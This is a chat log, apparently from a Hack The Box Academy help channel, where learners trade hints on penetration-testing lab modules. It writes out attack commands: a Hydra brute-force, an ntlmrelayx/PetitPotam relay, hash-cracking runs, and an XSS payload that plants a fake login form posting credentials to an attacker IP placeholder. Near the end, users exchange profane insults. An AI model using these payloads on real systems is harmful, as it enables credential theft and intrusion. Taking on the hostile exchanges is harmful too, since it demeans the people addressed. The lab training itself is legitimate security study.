Hey guys! Super new to HTB modules and I'm having some trouble understanding how to use the VM to carry out a scan with Nessus in the Vulnerability Assessment. The section in question is the "Getting Started with Nessus" section and I'm getting a bit overwhelmed with how to even start using Nessus at all. Does anybody have some tips to get me rolling?
Need some help if possible
guys. im doing the attacking common services lab. i found the domain, usernames and passwords but failing on ssh. any heads up!!!
Hello everyone I'm new here my greetings to you all
which assessment, easy, medium or hard?
medium
from the high port go to the default one
Can I get some nudging with the Footprinting Medium capstone ? Preferably in DM so we don’t spoil
jas@...: Permission denied (publickey).
this is what i get??
Do you have the public key, e.g. id_rsa?
@autumn pilot excuse me i have uploaded the shell successfully but i didn't get any output
in the file upload attacks module
on which module and section?
FILE UPLOAD ATTACKS
Page 5
Blacklist Filters
You are not supposed to get a shell on that machine to get the flag
Once you have a working php file that you have uploaded, e.g. php is being executed then you will be able to just get the file
Sorry, I thought you meant a reverse shell
Okay, so yea you can get a shell, but you need to find if the thing that you are uploading is being executed
sure, go for it
no. i guess i have to create one or download one
If there isn't the id_rsa of the user anywhere that you can get it, then you cannot ssh in
thanks. let me search
I've got a problem with a module where i have to use the flag of the previous question as a password to ssh into the next user. the problem is that the flag ends with !3 which translates to exit, any idea how to escape translation in the terminal?
single/double quotes?
nope they will be read as part of the password
hmm it works if i don't use the terminal but when i ssh via remmina
I am at the same module. What the hell is this thing with null passwords in the next tasks anyway???
the password is the flag of the previous question
and you have to ssh from one user to the other
Oh how nice of HTB not explaining this one.
yes did you complete the introduction to bash scripting already?
nah i completed it ... took me 5 days finding the obscure problem of the code and escaping it -.-
In fact, i am just doing this module to mark it complete for 2 Skill Paths, I did not read the material, just jumped straight to the tasks.
Again, password from previous task is not working.
I am starting to get frustrated.
user2
yeah don't use the terminal, use remmina or something else instead and paste it via right click
i'm stuck at the task for user7 atm
@alpine dome which module
@placid quest INTRODUCTION TO WINDOWS COMMAND LINE
@alpine dome Yeap, the password is not working
Remmina is not working as well
@alpine dome did you try with evil-winrm
It says SSH
the problem is with the terminal translating parts of the password in something else like the !3 of the password for user1 into exit, and again the ' ' in the one for user2, just copy paste everything manually ... except for the password for user7 it has a typo
the password for user7 is all lowercase
so for user2 i have to submit the flag I found from user1?
jup and so on
And ssh from inside the box, rather than from my own machine?
Now it does not allow me to login from user0
hmm? weird. restart again, it is mandatory to stay on the target from the end to the beginning because of the ssh session token
Fucking crap.
Why on earth do we have to put up with this and not simply focus on the damn tasks?
Not my first time, I have dealt with this for a very long time.
It is the "get frustrated harder" mindset of this toxic field.
it's part of the learning experience
Yes, I have heard this bullshit way too many times before as well.
I will not elaborate more, there is no use, noone will listen anyway.
pls tell me if you have solved the task for user7 i'd like to know how to approach it
i'm completely dumbfounded on that one solved all the others except for the last one and user7
@livid quest I have DMed you to avoid spamming here.
Hi all, I'm trying to make a tunnel in AD Skills Assessment Part I but I'm finding it impossible. Can someone give a sanity check please? Thanks
What have you tried?
chisel and ligolo. None of them work
Don't remember having any trouble with tunnels on that one, chisel should work most of the time. What error are you getting?
Better speak via DM to avoid spoiler, would you mind?
Ok
god damn it
can someone explain in intro to network analysis what is the correct answer to read the file /tmp/capture.pcap?
I tried -r file -X
this works
best practice would be -rX file.pcap
but that doesn't seem to work
tested on box
also -Xr seems to work but not for correct answer
You must specify the complete command as the answer.
Could anyone help with "ABUSING HTTP MISCONFIGURATIONS" - "Password Reset Poisoning"? I'll share what I am trying to do.
Thanks!
Is there a reason why rockyou.txt in SecLists is only accessible as root?
ls -la /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
-rw------- 1 root root 139921497 Sep 23 2015 /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
It's the HTB Parrot OS
depends, if you downloaded it as root yeah sure then root is its owner
It's the OS you can access through the browser, it was just a lil weird
delete it and download it as general user and just use sudo if necessary
anyone good with AD that is up for a DM?
ah it is pre "installed"
yeah sure as u see it is owned by root and can just be accessed by root
but when you go via terminal as root to the directory you can manage the rights for it
Yeah it was just weird
yeah it is pre installed in the root directory which makes sense because the home directory and its subdirectories just get mounted as part of the last installation process and their contents are predefined, so rockyou.txt is not a part of them
It's just weird cause this is the command they give you in the Module: LOGIN BRUTE FORCING
hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 178.35.49.134 -s 32901 http-get /
hmm kinda yeah, in general if you need to use a hacking tool always open a fresh terminal tab and run sudo su as the first command
Yeah i guess
same under kali
you can dm me with where you are at / what you have tried
Have you scanned all the Ports?
Does the live engagement on "Shells and payloads" require port forwarding from foothold to attacker machine?
I am finding it a little difficult to use the foothold machine.
You don't need Port Forwarding
A part of the engagement says to browse inlanefreight.htb but I don't seem to find any browser besides Tor in that parrot machine
Hey can someone help me with something in XSS module pls?
why isn't this script working to remove the image url form?
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
Have you actually made the change/edit to include your IP
and then have you gone down the chain to make the admin to visit that link
uhmm i dont really understand this part tbh sorry im a newbie
read through the module/section and follow the steps
you do the thing that was explained in the section of the module
e.g. the wall of text that you had read allegedly
lol i didn't mean that, i meant like what do i do to solve this, what am i doing wrong
as you can see in the pic i sent it's like a long text there and it looks like it didn't get executed
it doesn't appear like the images on the module
after injecting the payload
');document.getElementById('urlform').remove();'>
this one
Hello all,
I’m having issues with the Password Attacks - Hard lab. I’ve used CrackMapExec with the mutated password list, both Johanna and johanna, as well as --local-auth for good measure. Tried attacking winrm as well….but no dice…was wondering if someone could give me a nudge?
take another look at ||SMB||
I don’t fully remember this lab, but don’t copy and paste from the module (which is what you did). Start from scratch and build it as you go. The labs aren’t always copy and paste.
Hey can somebody help me with osTicket part in Attacking Common Applications, thanks
ah okay, so i have to figure it out from source code?
on whats going on and what am i doing wrong
that’s the point of the labs, to go through yourself and understand why it works. Not just copy and paste
Crackmap isn’t working on smb either…and smbclient is also giving me the blues 😢 slowly dying inside
you can dm me with what you’ve tried and where you’re stuck
You betcha!
hi, I got the flag from the \DC01\david\david.txt file in the Pass the Hash (PtH) section of the Password Attacks module, however it is apparently not the correct answer to the question.... Anyone got any help here or experienced the same?
to clarify the answer was correct for the \DC01\julio\julio.txt file, which is the next question (which is the same just for the julio user), and there are no other files on the \DC01\david share
yes you need to go from one server to another one then you can find it
from rdp one * 😉
sick thanks for the quick answer, however im still confused as to why once the share is accessed its contents would differ from server to server?
ok ill give it a go 😋
just read the lesson again and again 🙂 you will find it 🙂
i'm stuck on the next thing, maybe you can check then if you can connect there to the rdp client, for me this isn't working...
ok well it turns out i got the flag i just didn't realise the 1 was actually an l 😆
yeah worked for me, you mean the last question?
nope the next section pass the ticket, there the rdp creds don't work
you need to bypass it with the current sessions
not there yet then sorry just finished that section 😦
no stress 😉 i fixed on my way
thanks for the quick help again!
anyone able to assist or maybe able to tell me why chisel won't work on the server machine in the pivoting module? shows that GLIBC_2.32 not found but is required. is it something wrong with the build?
Try downloading the binary (1.7.4 worked for me)
ill try that
yea that is giving me the same error
what is the name of the file you downloaded on github?
don't download the zip, download the windows_amd64.gz
its being run on a linux machine.
im on Footprinting medium lab, I reached the end and i got the admin password but it isn't working when i enter it on hackthebox
so the linux_amd64?
yep
I didn't remember if it was windows or linux lol
gotcha. ill try that one
ok
Where exactly did you enter the password?
make sure there are no spaces before or after the password
ok. yes that seemed to have taken on the server. now to connect and get that flag
worked like a charm. thank you
no problem ^^
i got the password but i don't know how to log in to SQL server as administrator
I’ll check my notes, but I didn’t use LaZagne for it
check dm didn’t want to spoil the challenge.
Hi, stuck on Log Poisoning from FILE INCLUSION, I'm not able to see anything when accessing /var/log/apache2/access.log, why?
are you sure there are no filters in place? might want to try Burp Repeater as well
can I dm you?
sure!
thanks
Active Directory Enumeration and Attack > Bleeding Edge > PetitPotam. I have an issue when trying to obtain the CSR from the Web Enrollment services. Any idea?
sudo python3 ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
python3 PetitPotam.py 172.16.5.225 172.16.5.5
Anyone available to help me out with Attacking Enterprise Networks - Lateral Movement? Trying to get Set-DomainUserPassword to run but it is not a recognized cmdlet. I have imported powerview and even powersploit with no luck
I have an issue when requesting a TGT using the PKINIT tool gettgtpkinit.py. I always get this error saying that the KDC has no support for PDATA type. Does the machine support PKINIT?
Active Directory Enumeration & Attack > Bleeding Edge > PetitPotam
Hey guys, having trouble with the last question for the DNS section of the Footprinting module. Does anyone have any advice/ tips?
You need to find all zones
Okay so cant get ahold of support yet so gonna ask the fine individuals of modules for a little trouble shooting help
CBBH - EXAM TROUBLESHOOT CONNECTION
- I reset and added IP and <website.local> to /etc/hosts
- I can ping and nmap scan the ip address
- I'm connected to the Exam VPN
- What might be causing me to not be able to connect via browser?
Looks like it takes quite a while for it to actually come up even though its been "up" TLDR wait 5 minutes
Having an issue using hashcat to crack the .vhd file in the Password Attacks hard lab. It's showing me that it's going to take over 230 days to complete. I ran the commands, #bitlocker2john -i file_name.vhd > backup.hashes, #grep "bitlocker$0" backup.hashes > backup.hash and then ran #hashcat -m 22100 backup.hash /usr/share/wordlists/rockyou.txt (this is where my rockyou.txt file is at) -o backup.cracked. Any ideas why it's going to take so long?
File_name.vhd is actually backup.vhd because this is what I copied the drive to once I mounted it.
just use ur mut_password
john --wordlist=mut_passwort.txt backup.hash
Shouldn't take long
I'll give that a shot. Thank you!
if you haven't gotten it yet i would also try using john
I'm using john and I think I've got it but it's still going. I have a possible password with (?) beside it. Is that it?
Try it
it could be. i can't remember if mine had a ? or not but that has happened.
It's with an !
Thank you, both! I appreciate it!
Okay, I have the drive moved over to the Windows machine but it won't open or mount as a drive. I have it saved to the desktop. Any idea why it won't open or mount as a drive?
First thing that popped up when I used google
man none of these tunneling machines are updated for the new versions of these tools are they
statically built chisel go brrrr
im in the ptunnel-ng section
i just sent it but it doesn't have the GLIBC_2.34 version required
lol
im just gonna use the tool i know works and just keep in mind what i learned
build the tool statically
you're getting that error cause it's looking for the linked lib in the system. if you build statically your binary will be larger but it won't need external libraries and will function better
i thought i did build the tool statically
how do you build your tools?
im just going off what the section says to be honest
depends on the tool and what language it uses
for this one its the ptunnel-ng.
I am working on the Attacking Enterprise Networks Module, Web Enumeration and Exploitation section. The last question is on command injection and they lead me to believe I should be able to get a reverse shell with socat. I am wondering is there is anyone who might be able to help me decode the error I get from the socat connection? I can get the web host to make the connection back to me, but the connection immediately breaks.
i believe --disable-shared and --enable-static as options to configure before building with make will work. but I've not tested
I see some cases where libc won't build statically for some stuff despite the options which makes things tricky
i can give those options a try and let you know. I'm assuming that most of these tools are similar in that they have a static build option then?
if so then ill attempt to make sure i build it statically when this happens
in the future when i am doing this for real
depends on what it's programmed in
tools written in C usually are built with configure and make
ill keep that in mind. ptunnel-ng looked like it used a bash script to build with the autogen.sh
golang on the other hand defaults to building static bins, which is one reason why chisel feels so reliable most of the time
yea. i like chisel
@fathom pendant I got that, but I was trying to find a way to mount it to the machine we have access to in the session. I have the drive on my personal computer as well, but it won't let me open it. I found that it probably has to do with running Windows 11 and the TPM is blocking it. It won't even let me use a password to open it. I just get an Access Denied error.
Just as confused as you are…found the .vhd file, cracked the hash but have no clue what to do with it 😅 if I find something I’ll post it here
Thank you. I can't even open it because I stupidly updated to Windows 11 a few weeks ago. I should have stayed on Windows 10.
Once you've cracked the hash, the password it gives you will let you open the drive. You just have to mount it to a version of Windows before the TPM requirement.
yea windows 11 is trash
It looks pretty and I like some of the new features, but it really is a pain to work with in some ways. Case in point, working with downloaded .vhd files.
i think they are trying to make it more like linux or mac with some of the features. i reverted back as soon as i saw it
Okay, definitely feeling the “dumbest guy in the room” syndrome right now but it is what it is…so excuse the noob question…do I mount the file to the target machine from my machine (pwnbox) with the commands learned in The footprinting module?
I knew I should have done the same. Oh well. Live and learn. I'll hopefully be building a new rig soon and I'll definitely stick with Win 10.
@wanton mica you can DM me. I'll assist you with it.
Gotcha, boss
To all who are struggling with the B*****.v** file in the Password Attacks - Hard Lab…remember what @fathom pendant said…you need to mount the file to a Windows system….this can be ANY Windows system…😉😉
sorry to ping you, but can you help me with this section Weak Bruteforce Protections? https://academy.hackthebox.com/module/80/section/837#questionsDiv I have tried editing script with localhost and the wordlist is default-passwords.csv
can anyone help me with this section? or can i DM someone, thank you in advance.
Skills Assessment - File Inclusion can I dm anyone on this section?
Help please
for upload file inclusion
it doesn't work
- 2 Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"
it's successful while using Burp Suite
but when accessed in the browser
it doesn't work
Can dm me
thank you
still need help
hi guys...i have been trying to connect to an smb share so that i can download a file. i tried different usernames and passwords i cracked but i got this error message "do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)" help guys
Sidenote to this, it can be mounted on linux, but it's a bit more involved and you need to search a bit on what you need to install and how to do it. It is doable from the vm
Hi, I'm stuck for a question in File Transfer module at the second question of Windows File Transfer Methods. Can you help me ?
Is someone here at the Server-Side Attacks module?
Hey guys,
I am new to the HTB. Can someone pls help me with ssh tutorial. How to connect to the HTB server from my terminal
I am getting an error while connecting to the HTB. Error - port 22: Resource temporarily unavailable
@royal wren please check the faq
Restart machine
Is anyone else able to log into the Password Attacks - Pass the Ticket (Linux) machine using SSH over -p 2222? The first instructions state "Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory." But I'm unable to SSH over port 2222 with the provided creds.. "david@10.129.204.23: Permission denied (publickey,password)" "david@inlanefreight.htb: Permission denied (publickey,password)."
can you show your command with spoiler? should work
||ssh david@inlanefreight.htb -p 2222||
I also tried using the box IP instead of the domain, and made sure to put the domain in /etc/hosts when using it
try with this ||sudo ssh david@inlanefreight.htb@<target_ip> -p 2222||
Still no. I assume my command would have worked since before prompting for the password it gave the whole "The authenticity of host '[10.129.204.23]:2222 ([10.129.204.23]:2222)' can't be established. Blah Blah" and asked if I wanted to add it to the list of known hosts - you know, the typical SSH warning..
yea a few times
so you were able to get in then?
I just tried to SSH using creds from a previous module after spinning that box up too and got right into that previous module
at the time... haven't tried now but I am in the easy lab password ||trying to crack ssh|| and thought haven't got results seems to work when i try to connect
yeah that's good... make sure you store all the passwords from the exercises for the labs
appreciate your input! I guess I'll move on to the next module and come back if anyone is able to verify they can get in.
how long ago were you able to get in?
some days back tbh ...
Trying to run firefox_decrypt.py for the linux credential harvesting section of the password attacks module to get Wills password, but I keep running into the error Traceback (most recent call last): File "firefox_decrypt.py", line 46, in <module> PWStore = list[dict[str, str]] TypeError: 'type' object is not subscriptable has anyone encountered this? The tool runs fine on the attack box, but not on the target.
didn't have to use firefox_decrypt.py
Any tips? I've been stuck for a while
sure ! you already ssh right?
Yes, landed foothold after getting kira's password
sorry my fault i did use firefox now that I recall
you saw the ||.bash_history|| right?
Hi guys, any nudge on windows privilege escalation assessment 1 ? i cannot seem to find the user ldapadmin, i got a system shell but no luck on finding it
how are you running firefox_decrypt.py can you show your command with spoiler?
Hi, for "Active Directory Enumeration & Attacks, AD Enumeration & Attacks - Skills Assessment Part I". How do we upload chisel to the attack host? I tried upload via webshell it throws a server error. I try powershell cmd download, it also does not download anything. Thank you.
sure so I set up a python web server to get the file onto the target in the|| .mozilla/firefox|| directory and then once it was in there I ran ||python3 firefox_decrypt.py|| but it spits that error out to me every time
But if I run the file on my attacker machine it works fine, so it shouldn't be anything with the file
try with this one ||python3.9 firefox_decrypt.py|| just in case
That was it! Thank you!
I'd reset the lab
How are you connected to the host? RDP? Then you can mount a share drive.
Otherwise via SMB share on your PC, upload the file to a web server and download it from there. There are several possibilities.
Have a look at this module:
https://academy.hackthebox.com/module/details/24
I downloaded the parrot ISO to hack the box from the parrot page, to use pwnbox do I have to install something else?
thanks bro
After following those steps, do I have to do anything else? or with this I would already have the pwnbox
should walk you through how to setup the VM. Installing the tools you need, preferences, etc. is on you
You have to download the openvpn connection file in order to securely connect to the HTB network
^^ that is true. If you're setting this up to connect to the HTB network you'll need to do the above. You won't just be "connected" to the HTB network. If you want to use Pwnbox you could just use the web version which is already connected to the HTB network and has most of the tools you need
For this question, do I have to use the VPN?
o i dont pass photo here
i dont cant *
sorry for my english xD
you have a configuration, which you can download from the Academy site. From there you just need to execute sudo openvpn /path/to/config.ovpn on your VM to connect to the HTB network
use cURL from your Pwnbox (not the target machine) to obtain the source code of the https...... website and filter all unique paths of that domain. submit the number of these paths as the answer
for this question is it necessary to connect to the vpn?
wait I'm confused...
Are you on PwnBox (In-Browser) or a VM?
VM
in reality i don't know what a pwnbox is,
pwnbox = parrot?
i downloaded the ISO of the Parrot Security Hack The Box edition
if you're on a VM and the question requires you to connect/interact with HTB labs, yes you will need a VPN
I am a beginner who is eager to learn pentesting but i don't know what online resources are used. So, to all my seniors, please share with me the best resources to start my journey of learning pentesting. Thanks
HTB Academy, CPTS path.
How do you get HTB certificates?
Once you have passed the exam, you can simply download the certificate.
Thanks,
Hi, people. I need a little nudge with the Pivot assessment, I got everything - creds, keys, hashes, etc from the pivot machine and first target. I found the DNS ip address and scanned the two /24 networks, but I get no response from anything, so I can't start enumeration. Any help will be appreciated.
Which question are you stuck on?
You can send me a DM.
anyone free for this?
@acoustic owl will do, thanks.
Hi Guys,
any hint regarding the inject machine ?
I'm trying to upload a shell in an image form
changed the extension and the content type but still not working
Am I missing anything?
Read #welcome and verify your account. Then go to #1083533577410596956 . I'd also put your message in spoiler tags to avoid spoilers
would appreciate any nudge.. i finished the whole module but still stuck on this one
Always bake a || lazagne ||
@acoustic owl can i dm you about ad skill assessment II?
Yes sure, but which SA?
the second one, I solved it just have some questions
@acoustic owl i tried it and again [+] 0 passwords have been found.
Send me a DM
Still need help? If yes, then DM
Thanks but now i have completed that module
yo anyone can guide me a bit on the first scenario of the AD skill assessment
Hi,
On AD Enumeration & Attacks - Skills Assessment Part I
Has anyone found how to get the clear password of tpetty?
I'm stuck on compromising the DC and accessing it.
I'm in RDP on MS01 but i'm stuck here ...
yo im literally exactly there
wanna work on it together?
@livid bluff @jaunty vigil feel free to dm if you're stuck
perfect I've heard of two ways to solve this but as long as you got it🙏
ok ill dm you to learn haha
If you know another way, I'm happy to learn
I think with mimikatz the passwords appeared as (null)
I remember I followed this tutorial. https://www.youtube.com/watch?v=M1O7xH2uJtM
hi, is there anyone who can possibly guide me for the following please: ** Question for Windows Priv Esc PILLAGING - Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.** - Could someone point me in the right direction, I'm running user Jeff as admin and still get access denied when getting the backup.
|| restic.exe || is your friend
ohh really?! , thank you kindly for the tip. I shall give it another go.
If you need help with send me a DM
thank you, appreciate it
hello all, I am doing Attacking Common Applications - Skills Assessment II, and I managed to get a terrible shell via msfconsole and i can't upgrade it, looking for flag.txt, but no results, I searched in every directory and i could not find it, i thought i might need to elevate my privileges to find the flag in the root dir., but it's impossible with the shell i have
and i found some credentials, but they serve nothing
any help and/or nudge is well appreciated
alright. time to admit im stuck. im in the skill assessment for the pivoting. i was able to get into the first windows machine. i found the user and was able to get the hash for the v user and stuff. dont know if i need it but i got it. found the other machine im supposed to pivot to but the user im using cant connect. any nudges?
once you have those credentials you must look for an ip address to be able to connect with v***, note that there is an ip address that is a ||rabbit hole||
well there are 2 ips i found but one doesn't seem to connect at all. the other im figuring i gotta use the user v but other than the hash from an lsa dump i can't seem to crack his creds. im assuming it's nothing rockyou can find
if u have completed Blacklist Filters from FILE UPLOAD ATTACKS , can I dm you?
sure
thanks
im having issues getting the creds for v. is it an "i need to crack it" type cred or an "it's somewhere if i search deep enough" type.
actually when i reset im going to attempt to use metasploit to start with to see if i can get a better route
some updates on the issue, I made a custom name/pass list to brute force ssh and i got no results,
please any help is really appreciated, and i did explore the system more
Have you discovered all the vhosts?
i have tried rce via WordPress, but login creds are wrong
vhost: blog , so i assumed it's blocked path
Yea, there's blog and there's 1 more
||The credentials you found should be useful in 1 of them||
i think you referring to "vhost; monitoring"
i got a shell via that vhost, but it's a terrible shell, i can't find the flag location with that user (www-data)
Enumerate that second vhost to identify the app, and search for public exploits. I don't remember using Metasploit, you might get a better shell with a different script
um, try with|| lsass and mimikatz||
i used an lsa dump to get the hash. but i havent tried mimikatz so i can try that next
I just finished the *Attacking Common Applications * module, a great thank for @steady hawk for the nice nudge
We allowed to ask for guidance on enterprise labs here? I am wanting to ask if a certain exploit is possible through this method I am trying to use.
this is for academy modules. I’m actually not sure if there is a channel for that unless it is role locked. Is there no support button/view on the site?
There is a contact support, but I am mainly just wanting to see if my thought process on trying to carry out a certain potential exploit is correct. I was seeing if it'd be okay to ask the community here about it if it's allowed.
I don’t think it’s against any rules the only problem is most of the people here probably don’t have access to the enterprise labs and therefore wouldn’t be able to help. I wish my company paid for them🙃
you could try verifying your account (#welcome) and then ask in #1024429874246590575 ?
Well the exploit is particular to the labs. It's mainly me wondering if altering a server response to pull from my custom url rather than another url could lead to RCE or a reverse shell.
But yeah, didn't even realize I wasn't verified.
Ill do that instead lol
nvm, after playing this out I realize this "exploit" only affects client side and not server side.
thats nice, this is for discussion on module content
how do i properly format my answer to this question Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.
no matter which way i copy the hash it won't accept it, im forcing ntlm too so that's not the issue
Hello Everyone. I connected to a vpn. And its showing green. but it will not let me "spawn Machine". Basically like I haven't completed the previous step. Is this a bug?
in the beginning of HTB Academy it does.
i tried multiple combinations this wasnt much of a hint lol i tried the straight ntlm hash
shit like this is why im so slow completing academy. since i can't write spoilers: it's not any variety of :hash1:hash2:::
you need the hash. My hint was more than enough. An earlier module or an earlier section breaks down what you sent. Do some research and figure out what that line is
yeah ok
Now that I got it right, just wanted to say ur hint was shitty and the answer doesn’t make any sense. I’m under the assumption the NTLM hash is two hashes, the NT and LM hash. The answer it required of me… even in the examples used in Active Directory Fundamentals they were shown with both hashes
@rustic sage don’t be a smart ass with ur useless hint that anyone with eyeballs can understand
hey screw off. they were correct. the whole line you were trying wasnt the hash. Dont blame them because you didnt understand
We aint getting paid to help you so fuck off with that entitled bullshit
Fuck off, it was a simple question with a simple answer and his answer was condescending. The answer to this still makes no fucking sense to me. This is a direct quote from the fucking AD Fundamentals module on this shit: An NT hash takes the form of b4b9b02e6f09a9bd760f388b67351e2b, which is the second half of the full NTLM hash. An NTLM hash looks like this:
Rachel:500:aad3c435b514a4eeaad3b935b51304fe:e46b9e548fa0d122de7f59fb6d48eaa2:::
no that has the user, rid, and separation tokens in it, thats not a whole hash
moron
wanna bitch about other people and have 0 reading comprehension then blame others
karen energy
yelling at people cause youre too dumb to copy paste a hash and then cry about it
lmao
instead of saying thanks for the help and moving on with life
@sterile hawk can we do something about this asshat
Could a moderator explain to this guy the rules of etiquette?
Right like even if a piece of advice/hint wound up not being useful to you directly doesnt mean you act like an ungrateful piece of shit over it.
I am not talking about you
I know, Im agreeing with your agreeing with me
Hi guys, looking for your suggestions, what do you think about the modules below:
(their ratings don't seem that high, but the syllabus looks interesting)
- SESSION SECURITY
- SERVER-SIDE ATTACKS
- WEB SERVICE & API ATTACKS
All three modules are really cool. I liked them all
glad to hear that, thanks!
ty
Can someone lend me a hand on the Server-Side Attacks – Skills Assessment please? I’ve been at it for days.. I’ve tried the following: ||I deobfuscated a JS file. I tried fuzzing for parameters to try SSRF with the contents from the file. I’ve also tried SSTI and SSI on endpoints with no luck. Not sure what to do next.||
Take a close look at the JS file.
||I did, it revealed an internal address. I'm not sure how to access it without SSRF.||
Send me a DM
Thank you, I did
Can anyone give me a sanity check in Linux Privesc - Special Permissions? i think the first question might be broken
Send me a DM
I am not really sure but I think the footprinting lab - easy is not working correctly because if I connect (successfully) to the ftp server its just empty. Reading some posts on here there should be a pub / priv key pair
Am I doing something wrong ?
Did you scan all the ports?
yeah
are you sure
I finished the easy module. But can I dm you? I got a question but I don't want to spoil it for others
I have like 0 notes on that assessment so probably wont be able to help much. I just remembered that bit cause of the payloads hint
ah ok
If you still need help, you can write me a DM
@acoustic owl found all the zones for the dns footprinting module, no success, tried brute forcing with every list and have nothing
You only need to bruteforce zones that do not give out the data voluntarily
can i have another hint?
Sure, send me a DM so we don't spoil here
Added
Hey y'all! I am new here and would like to know if this is the correct channel to ask for help with my module assessments?
Hey guys if anyone is available im still stuck on this assessment for pivoting about the same place as i was earlier
yes, for once an unverified user is in the correct channel!
Help! In Javascript Deobfuscation, the qn is "Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?" I have the code and I'm not sure what I should be looking at/for on the webpage using Ctrl+U
Lol Thanks! I got tired of getting yelled at on Reddit for being in the wrong room.
Try to understand what the code is doing and try to replicate it, and you should get the key. Hint: ||curl||
ok nvm i got a step further than i did before
anyone able to assist with a question on web attacks module final skills assessment?
actually idk if its a step further or just something i was able to do
I might be able to, dm me if you'd like
Thank you! I figured it out. Appreciate your help
yea im not a step further. on the pivoting skills assessment i was able to pivot to the first windows machine and got the hash for the v user. cant crack it but i was able to sign into their account using pth. any nudges from here would be good because i cant seem to get any of my chains to work past the pivot host
also i do have the IP of the other 2 hosts on the subnet but cant get nmap or anything to reach out to them atm
Hey guys, I am currently on Nibbles - Initial foothold, in the Get Started module.
For some reason, after I upload the .php file, Nibbles never loads.
No response to my nc listener, if I curl the path to the file it never loads, neither if I try to load it through the browser.
Sure
Anyone available that did the LDAP Enum module for a quick chat? I'm trying to figure out why some stuff works. :P
hey so im currently trying to complete all the fundamental modules and at the moment i just started the mac os fundamentals module. the first question was answered on the page it was on but the second question is asking for mac os specific details and i didnt get a vpn connection or a target box to use. the only thing i get is the parrot os instance that is used for most other modules. how can i answer the questions about details of a mac os when im not on a mac os?
are you using a mac ?
if yes go to your apple icon and about mac then you find the macOS version
yeah sometimes it is expecting you to have access to specific things which is weird because most modules give you a dummy to log into to look at
no im not using a mac. if i was i would be able to complete the task easily.
yeah i was expecting a virtual machine to use for the module. only one you get is the parrot os. i guess i wasted my cubes. even if i was on a mac my individual details wouldnt be the correct answer the module is asking for, so i dont know what to do. i guess ill just eat the loss.
Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? On this question I tried answering Read servicePrincipalName but it didn't work, any hint pls?
@twin current it actually does tell you on the module page
that one is kinda on you at that point sorry m8 :/ you might be able to ping support about it using the chat bubble in the bottom right
Hello everyone.
im working on "ATTACKING ENTERPRISE NETWORKS" - "Lateral Movement"
the question
"Perform a Kerberoasting attack and retrieve TGS tickets for all accounts set as SPNs. Crack the TGS of the backupjob user and submit the cleartext password as your answer"
I have the cracked password, but HTB wont accept it? and the same goes for the question about the admin flag. any ideas what the deal is?
sometimes there's a hidden extra space character at the start or end of a copy/paste
doublecheck that
hello all
i tried to complete the hashcat module and i am stuck on the section: Cracking Common Hashes
the question is : Crack the following hash: 7106812***********************83
hash id says md2/5/4. i tried 4 or 5 with hashcat, rockyou and multiple built-in rules (rockyou3000, d3ad0ne)
but nothing works.... if someone has a hint it will be very appreciated 🙂
thanks all have a nice day
did you try md2
no but i didnt find md2 mode in hashcat
can I dm anyone on COMMAND INJECTIONS Skills Assessment?
Could you get through? If not, feel free to dm me to see the code in your upload file
Cheers
Hello! I'm looking for help in the Dynamic Port Forwarding with SSH and SOCKS Tunneling
Any hint on how to solve the "[ERROR][com.freerdp.client.x11] Please check that the $DISPLAY environment variable..."
I have tried both with PowerShell and CL
got it!
Can dm me
Thanks, I sorted it out 🙂
you can search for the latest version with the search engine of your choice. The question wants to know the version of your Mac.
There is a way to set up macOS in VMware so you can run it even if you are on Windows or Linux.
anyone done Linux privesc ? I have a flag fs but wont accept it (i checked for extra spaces)
hi, anyone got a hint for which wordlist is good for q4 on footprinting dns?
been trying to bruteforce it (which i believe is what the question requires) for over an hour with no luck yet
youve checked sec lists ?
ye ive been trying a few different ones from there
but they have just been giving the same few subdomains that dont match what i need
cant remember which one i used :/
Iirc you need a more fierce wordlist
🫡
hey, have you done linux privesc module? 😄
No
Would anybody be willing to help me out with the Medium Footprinting lab? I am stuck at MSSQL part. I got the information from the secret file on the user account but I can't seem to use it anywhere.
Sure, with secret file do you mean|| im***.txt||?
@manic perch yeah, I have not been able to use it to get into MSSQL or the other local account
Ah wait, I solved it. Had the contents of the file copied into a text editor that made a certain character look like a different one, it's working now.
the fierce lists didnt give me the answer either 😦
What's the question for that one again?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
just trying with a bash for loop rather than dnsenum in case that makes a difference
but so far every wordlist ive tried has given me the same 3 results and none ended in .203
Keep in mind that if you can perform a zone transfer on that domain then there's no point in brute forcing it as you already know all the hosts there, perhaps there's a subdomain/zone that requires this brute forcing instead?
Hello. I am trying to upload an image of Parrot OS to digital ocean for the VPS setup but when I zip the ISO into a .tz and upload it I do not see the image in my choices list when spinning up a new droplet. I am also trying to feed a URL into the custom image URL input field but this does not seem to work for me either. What am I doing incorrectly?
thanks, i did try to bruteforce against some of the subdomains i found but looks like i missed one
following a new lead now 🤞
🥳 cant believe how long that question took me but i now have an answer
Because subdomains of subdomains my friend
Ah your message didn't load
is there anyone available that could assist me in tunneling with chisel? im still stuck on the pivoting assessment and i think i figured out a way to get to the second machine after the pivot host but i dont think my tunnels are working the way they should
Anyone come from india
What is the deal with this stuff?
VPN connected
one day it works fine, next day it's a coin flip. This has happened enough to start getting annoying. Can't hit the box at all, reset the box > same issue. Restart the VM and VPN and such, same problem.
anyone has completed htb Active Directory Enumeration & Attacks module? i have CRTP. should i do this module to escalate my AD Skills? or it covers the same CRTP Content
DM me, I just finished the assessment. Kudos to @acoustic owl for the nudge, when I needed it 
ok
